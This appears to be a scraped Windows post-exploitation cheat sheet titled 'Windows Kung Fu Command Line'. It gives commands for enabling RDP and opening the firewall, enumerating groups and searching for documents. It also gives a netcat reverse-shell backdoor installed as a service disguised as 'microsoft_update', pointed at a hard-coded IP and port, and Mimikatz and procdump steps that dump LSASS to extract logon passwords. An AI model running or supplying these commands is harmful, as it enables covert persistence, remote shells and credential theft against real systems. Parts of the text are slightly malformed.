Windows Kung Fu Command Line

Enable RDP
reg add “hklm\system\currentcontrolset\control\terminal server” /f /v fDenyTSConnections /t REG_DWORD /d 0
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable

View user on group
net localgroup Users
net localgroup Administrators

search all .doc file
dir/s *.doc
Start a new CMD shell and (optionally) run a command/executable program
start cmd.exe /k notepad.exe

Netcat backdoor
sc create microsoft_update binpath=”cmd /K start c:\nc.exe -d ip-of-hacker port -e cmd.exe” start=
auto error= ignore/c C:\nc.exe -e c:\windows\system32\cmd.exe -vv 116.56.33.161 1337

Mimikatz
mimikatz.exe “privilege::debug” “log” “sekurlsa::logonpasswords”
Procdump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe “sekurlsa::minidump lsass.dmp” “log” “sekurlsa::logonpasswords”
C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp 32 (For 32 bit system)
C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp 64 (For 64 bit system)

Loading